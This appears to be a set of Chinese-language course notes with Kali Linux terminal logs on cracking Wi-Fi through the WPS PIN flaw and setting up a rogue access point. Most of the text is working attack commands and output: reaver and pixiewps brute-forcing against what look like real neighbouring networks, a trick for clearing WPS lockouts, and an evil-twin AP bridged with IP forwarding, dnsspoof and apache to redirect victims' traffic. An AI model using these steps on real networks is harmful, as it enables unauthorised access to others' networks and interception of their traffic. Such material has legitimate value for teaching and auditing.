WPS (WIRELESS PROTECTED SETUP)
WPS是WiFi联盟2006年开放的一项技术
通过PIN码来简化无线接入的操作,无需记住PSK
路由器和网卡各按一个按钮就能接入无线
PIN码是分为前后各4位的2段共8位数字
安全漏洞
2011年被发现安全涉及漏洞
接入发起方可以根据路由器的返回信息判断前4位是否正确
而PIN码的后4位只有1000中定义的组合(最后一位是checksum)
所以全部穷举破解只需要11000次尝试
PSK: 218,340,105,584,896
标准本身没有设计锁定机制,目前多个厂商已实现锁定机制
WPS (WIRELESS PROTECTED SETUP)
包括Linksys在内的很多厂家的无线路由器无法关闭WPS功能
即使在WEB节目中有关闭WPS,配置也不会生效
攻击难度相对较低,防御却十分困难
理论上可在4-10小时爆破密码(实际15-20小时)
PSK
早期某些厂家的AP用计算器直接算出PIN
C83A35
00B00C
WPS (WIRELESS PROTECTED SETUP)
启动侦听模式后,发现支持WPS的AP
wash -i wlan0mon
airodump-ng wlan0mon –wps
爆破PIN码
reaver -i wlan0mon -b <AP mac> -vv
秒破PIN码
reaver -i wlan0mon -b <AP mac> -vv -K 1
pixiewps
只适用于固定厂商的芯片,成功率很低
reaver -i wlan0mon -b <AP mac> -vv -p 88888888
root@kali:~# wash -i wlan0mon
BSSID Ch dBm WPS Lck Vendor ESSID
——————————————————————————–
40:31:3C:FD:BE:D2 1 -87 2.0 No RalinkTe Xiaomi_BED1
00:1F:8F:90:AB:69 11 -87 1.0 No Broadcom ChinaNet-cVUF
98:BC:57:76:36:7A 13 -93 2.0 No RalinkTe ChinaNGB-YdMeY4
root@kali:~# airodump-ng wlan0mon –wps
CH 14 ][ Elapsed: 1 min ][ 2019-03-08 23:54
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH WPS
D8:B0:4C:C3:25:E0 -69 39 0 0 11 65 WPA2 CCMP PSK 0.0
D4:EE:07:67:22:90 -72 37 62 0 8 270 WPA2 CCMP PSK
00:BE:9E:2E:E5:ED -79 39 0 0 2 130 WPA2 CCMP PSK 0.0
D0:76:E7:51:2A:78 -85 39 8 0 1 270 WPA2 CCMP PSK 0.0
00:1F:8F:90:AB:69 -86 30 0 0 11 130 WPA2 CCMP PSK 1.0
98:BC:57:76:36:7A -88 5 0 0 13 270 WPA2 CCMP PSK 2.0
D4:EE:07:54:4F:A8 -87 2 0 0 1 130 WPA2 CCMP PSK 0.0
94:D9:B3:93:DF:45 -88 11 0 0 1 405 WPA2 CCMP PSK 0.0
9C:A5:25:11:FB:C8 -86 15 0 0 11 65 WPA2 CCMP PSK 0.0
BSSID STATION PWR Rate Lost Frames Probe
D4:EE:07:67:22:90 A4:50:46:E0:FA:06 -34 0 – 1e 2 62
D4:EE:07:67:22:90 D4:A1:48:4B:96:F6 -84 0 – 6 0 1
D4:EE:07:67:22:90 5C:F5:DA:E2:35:A6 -1 0e- 0 0 28
D4:EE:07:67:22:90 20:16:B9:33:38:F3 -26 0 -12e 0 1
(not associated) 34:13:E8:98:B9:3A -86 0 – 1 0 1
(not associated) DA:A1:19:DA:31:95 -88 0 – 1 0 3 BOSZJOA
root@kali:~# reaver -i wlan0mon -b 00:1F:8F:90:AB:69 -vv -c 11
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Switching wlan0mon to channel 11
[+] Waiting for beacon from 00:1F:8F:90:AB:69
[+] Received beacon from 00:1F:8F:90:AB:69
[+] Vendor: Broadcom
[+] Trying pin “12345670”
[+] Sending authentication request
[!] Found packet with bad FCS, skipping…
[+] Sending association request
[+] Associated with 00:1F:8F:90:AB:69 (ESSID: ChinaNet-cVUF)
[+] Sending EAPOL START request
root@kali:~# ifconfig wlan0mon down
root@kali:~# ifconfig wlan0mon up
root@kali:~# reaver -i wlan0mon -b 14:75:90:21:4F:56 -vv -c 11
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
[+] Switching wlan0mon to channel 11
[?] Restore previous session for 14:75:90:21:4F:56? [n/Y]
[+] Waiting for beacon from 14:75:90:21:4F:56
[+] Associated with 14:75:90:21:4F:56 (ESSID: TP_LINK_4F56)
[+] Starting Cracking Session.Pin count:0, Max pin attempts: 11000
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] WARNING: Receive timeout occurred
root@kali:~# service network-manager stop
root@kali:~# airmon-ng check kill
Killing these processes:
PID Name
765 dhclient
988 wpa_supplicant
root@kali:~# airmon-ng start wlan0mon
No interfering processes found
PHY Interface Driver Chipset
phy0 wlan0 rt2800usb Ralink Technology, Corp. RT5370
(mac80211 monitor mode vif enable for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
root@kali:~# wash -i wlan0mon
Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
root@kali:~# reaver -i wlan0mon -b 40:31:3C:FD:BE:D2 -vv -K 1
# -K 尝试漏洞破解密码
WPS (WIRELESS PROTECTED SETUP)
问题:
很多厂家实现了锁定机制,所以爆破时应注意限速
一旦触发锁定,可尝试耗尽AP连接数,令其重启并解除WPS锁定
综合自动化无线密码破解工具wifite
root@kali:~# wifite
. .
.´ · . . · `. wifite 2.2.5
: : : (¯) : : : automated wireless auditor
`. · ` /¯ ´ · .´ https://github.com/derv82/wifite2
` /¯¯¯ ´
[!] Warning: Recommended app hcxdumptool was not found. install @ https://github.com/ZerBea/hcxdumptool
[!] Warning: Recommended app hcxpcaptool was not found. install @ https://github.com/ZerBea/hcxtools
[+] Using wlan0mon already in monitor mode
NUM ESSID CH ENCR POWER WPS? CLIENT
— ————————- — —- —– —- ——
1 ziroom401 8 WPA 29db no
2 (D8:B0:4C:C3:25:E0) 11 WPA 27db no
3 ChinaNet-9gzV 2 WPA 19db no
4 ziroom501 1 WPA 17db no
5 zxx 1 WPA 14db no
6 ziroom102 1 WPA 14db no
7 Xiaomi_BED1 1 WPA 13db yes
8 ChinaNet-cVUF 11 WPA 12db yes
9 (9C:A5:25:11:FB:C8) 11 WPA 12db no
[+] select target(s) (1-9) separated by commas, dashes or all: 7
[+] (1/1) Starting attacks against 40:31:3C:FD:BE:D2 (Xiaomi_BED1)
[+] Xiaomi_BED1 (14db) WPS Pixie-Dust: [4m27s] Initializing (Timeouts:2) ^C
[!] Interrupted
[+] 3 attack(s) remain
WPS及其他工具
root@kali:~# service network-manager stop
root@kali:~# airmon-ng check kill
Killing these processes:
PID Name
765 dhclient
988 wpa_supplicant
先打上面的两个命令,把网卡映射到虚拟机,记住这个顺序
root@kali:~# ifconfig //看不到网卡
root@kali:~# ifconfig -a //必须运作ifconfig -a 才可以看到网卡
root@kali:~# airmon-ng start wlan2
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1672 avahi-daemon
1673 avahi-daemon
PHY Interface Dirver Chipset
phy0 wlan2 ath9k_htc Atheros Communications, Inc . AR9271 802.11
(mac80211 monitor mode vif enbale for [phy0]wlan2 on [phy0]wlan2mon)
(mac80211 station mode vif disbale for [phy0]wlan2)
root@kali:~# iwconfig
eth0 no wireless extensions.
wlan2mon IEE 802.11bgn Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
lo no wireless extensions.
root@kali:~# wash
Wash v1.6.5 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
Required Arguments:
-i, –interface=<iface> Interface to capture packets on
-f, –file [FILE1 FILE2 FILE3 …] Read packets from capture files
Optional Arguments:
-c, –channel=<num> Channel to listen on [auto]
-n, –probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-F, –ignore-fcs Ignore frame checksum errors
-2, –2ghz Use 2.4GHz 802.11 channels
-5, –5ghz Use 5GHz 802.11 channels
-s, –scan Use scan mode
-u, –survey Use survey mode [default]
-a, –all Show all APs, even those without WPS
-j, –json print extended WPS info as json
-U, –utf8 Show UTF8 ESSID (does not sanitize ESSID, dangerous)
-h, –help Show help
Example:
wash -i wlan0mon
root@kali:~# wash -i wlan0mon
BSSID Ch dBm WPS Lck Vendor ESSID
——————————————————————————–
40:31:3C:FD:BE:D2 1 -89 2.0 No RalinkTe Xiaomi_BED1
00:1F:8F:90:AB:69 11 -85 1.0 No Broadcom ChinaNet-cVUF
98:BC:57:76:36:7A 13 -89 2.0 No RalinkTe ChinaNGB-YdMeY4
root@kali:~# reaver -i wlan0mon -b 40:31:3C:FD:BE:D2 -vv -K 1
root@kali:~# reaver -i wlan0mon -b 40:31:3C:FD:BE:D2 -vv # 开始11000次 pin码尝试
root@kali:~# pixiewps
Pixiewps 1.4 WPS pixie-dust attack tool
Copyright (c) 2015-2017, wiire <wi7ire@gmail.com>
Usage: pixiewps <arguments>
Required arguments:
-e, –pke : Enrollee public key
-r, –pkr : Registrar public key
-s, –e-hash1 : Enrollee hash-1
-z, –e-hash2 : Enrollee hash-2
-a, –authkey : Authentication session key
-n, –e-nonce : Enrollee nonce
Optional arguments:
-m, –r-nonce : Registrar nonce
-b, –e-bssid : Enrollee BSSID
-v, –verbosity : Verbosity level 1-3, 1 is quietest [3]
-o, –output : Write output to file
-j, –jobs : Number of parallel threads to use [Auto]
-h : Display this usage screen
–help : Verbose help and more usage examples
-V, –version : Display version
–mode N[,… N] : Mode selection, comma separated [Auto]
–start [mm/]yyyy : Starting date (only mode 3) [+1 day]
–end [mm/]yyyy : Ending date (only mode 3) [-1 day]
-f, –force : Bruteforce full range (only mode 3)
Miscellaneous arguments:
-7, –m7-enc : Recover encrypted settings from M7 (only mode 3)
-5, –m5-enc : Recover secret nonce from M5 (only mode 3)
Example (use –help for more):
pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
root@kali:~# reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv -K 1
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
[+] Waiting for beacn from 00:90:4C:C1:AC:21
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
^C
[+] Nothing done, nothing to save.
root@kali:~# reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv -p 52737488 -c 1
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
^C
[+] Nothing done, nothing to save.
EVIL TWIN AP / ROGUE AP
其他工具
WPS (WIRELESS PROTECTED SETUP)
蹭网与被蹭网
北上广20%的公共场所无线网络是伪造的
WPS (WIRELESS PROTECTED SETUP)
airbase-ng -a <AP mac> –essid “kifi” -c 11 wlan2mon
apt-get install bridge-Utils 安装网桥
brctl addbr bridge
brctl addif Wifi-Bridge eth0
brctl addif Wifi-Bridge at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig bridge 192.168.1.10 up
route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.1.1
root@kali:~# airodump-ng wlan0mon
CH 5 ][ Elapsed: 54 s ][ 2019-03-09 00:58
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
D8:B0:4C:C3:25:E0 -70 20 0 0 11 65 WPA2 CCMP PSK <leng
D4:EE:07:67:22:90 -77 22 1 0 8 270 WPA2 CCMP PSK ziroo
00:BE:9E:2E:E5:ED -78 18 0 0 2 130 WPA2 CCMP PSK China
D0:76:E7:51:2A:78 -84 19 0 0 1 270 WPA2 CCMP PSK ziroo
9C:A5:25:11:FB:C8 -86 14 0 0 11 65 WPA2 CCMP PSK <leng
00:1F:8F:90:AB:69 -88 16 0 0 11 130 WPA2 CCMP PSK China
D4:EE:07:54:4F:A8 -88 4 0 0 1 130 WPA2 CCMP PSK zxx
40:31:3C:FD:BE:D2 -86 2 0 0 1 130 WPA2 CCMP PSK Xiaom
BSSID STATION PWR Rate Lost Frames Probe
D4:EE:07:67:22:90 D4:A1:48:4B:96:F6 -1 2e- 0 0 1
D4:EE:07:67:22:90 20:16:B9:33:38:F3 -26 0 – 6e 0 5
D4:EE:07:67:22:90 A4:50:46:E0:FA:06 -48 0 – 1e 13 4
root@kali:~# airbase-ng -c 11 –essid wifi-free wlan0mon # 伪造wifi-free无线网络
01:00:44 Created tap interface at0
01:00:44 Trying to set MTU on at0 to 1500
01:00:44 Trying to set MTU on wlan0mon to 1800
01:00:45 Access Point with BSSID 00:02:6F:BE:66:41 started.
root@kali:~# ifconfig -a # 出现了at0伪造网卡
root@kali:~# airodump-ng wlan0mon # 再侦听一下,出现了wifi-free无线网络
CH 7 ][ Elapsed: 37 s ][ 2019-03-09 01:03
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:02:6F:BE:66:41 0 480 0 0 7 54 OPN wifi-free
D4:EE:07:67:22:90 -72 13 3 0 8 270 WPA2 CCMP PSK ziroom401
D8:B0:4C:C3:25:E0 -73 13 0 0 11 65 WPA2 CCMP PSK <length:
00:BE:9E:2E:E5:ED -80 12 0 0 2 130 WPA2 CCMP PSK ChinaNet-
D0:76:E7:51:2A:78 -85 15 0 0 1 270 WPA2 CCMP PSK ziroom501
D4:EE:07:54:4F:A8 -85 6 0 0 1 130 WPA2 CCMP PSK zxx
9C:A5:25:11:FB:C8 -86 13 0 0 11 65 WPA2 CCMP PSK <length:
00:1F:8F:90:AB:69 -87 11 0 0 11 130 WPA2 CCMP PSK ChinaNet-
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 40:E2:30:CD:AB:C3 -76 0 – 1 0 1
(not associated) 34:13:E8:98:B9:3A -84 0 – 1 0 1
D4:EE:07:67:22:90 A4:50:46:E0:FA:06 -46 0 – 1e 0 14
D4:EE:07:67:22:90 DC:F0:90:8B:A1:A6 -58 0 – 6 0 1
root@kali:~# apt-get install bridge-utils # 安装网桥
root@kali:~# brctl
Usage: brctl [commands]
commands:
addbr <bridge> add bridge
delbr <bridge> delete bridge
addif <bridge> <device> add interface to bridge
delif <bridge> <device> delete interface from bridge
hairpin <bridge> <port> {on|off} turn hairpin on/off
setageing <bridge> <time> set ageing time
setbridgeprio <bridge> <prio> set bridge priority
setfd <bridge> <time> set bridge forward delay
sethello <bridge> <time> set hello time
setmaxage <bridge> <time> set max message age
setpathcost <bridge> <port> <cost> set path cost
setportprio <bridge> <port> <prio> set port priority
show [ <bridge> ] show a list of bridges
showmacs <bridge> show a list of mac addrs
showstp <bridge> show bridge stp info
stp <bridge> {on|off} turn stp on/off
root@kali:~# brctl addbr bridge
root@kali:~# brctl addif bridge eth0
# 此处需要将kali网络改为主机模式
root@kali:~# dhclient eth0
root@kali:~# brctl addif bridge eth0
root@kali:~# brctl addif bidge at0
root@kali:~# ifconfig eth0 0.0.0.0 up
root@kali:~# ifconfig at0 0.0.0.0 up
root@kali:~# ifconfig bridge 10.1.1.101
root@kali:~# netstat -ar
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 10.1.1.1 0.0.0.0 UG 0 0 0 bridge
root@kali:~# route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.1.1.1
root@kali:~# netstat -ar
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 10.1.1.1 0.0.0.0 UG 0 0 0 bridge
10.0.0.0 10.1.1.1 255.0.0.0 U 0 0 0 bridge
WPS (WIRELESS PROTECTED SETUP)
echo 1 > /proc/sys/net/ipv4/ip_forward
dnspoof -i bridge -f dnsspoof.hosts ┃
/usr/share/dnsiff/dnsspoof.hosts ┃
┃apachet2ctl start ┃
╋━━━━━━━━━━━━━━━━━━━╋
root@kali:~# vim /proc/sys/net/ipv4/ip_forward
不让修改数据!
# 开启ip转发功能
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@kali:~# cat /proc/sys/net/ipv4/ip_forward
1
root@kali:~# dnsspoof -i bridge -f dnsspoof.hosts
root@kali:~# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
root@kali:~# cat /usr/share/dnsiff/dnsspoof.hosts
root@kali:~# vim host
root@kali:~# dnsspoof -i bridge -f host
root@kali:~# apache
apache2 apache2ctl apachectl apache-users
root@kali:~# apachet2ctl start
AH00558: apache2: Coule not reliably determine the Server’s fully qualified domain name, using 127.0.1.l.Set the ‘ServerName’ directive globally to suppress this message
root@kali:~# netstat -pantu | grep :80
tcp6 0 0 :::80 :::* LISTEN 2941/apache2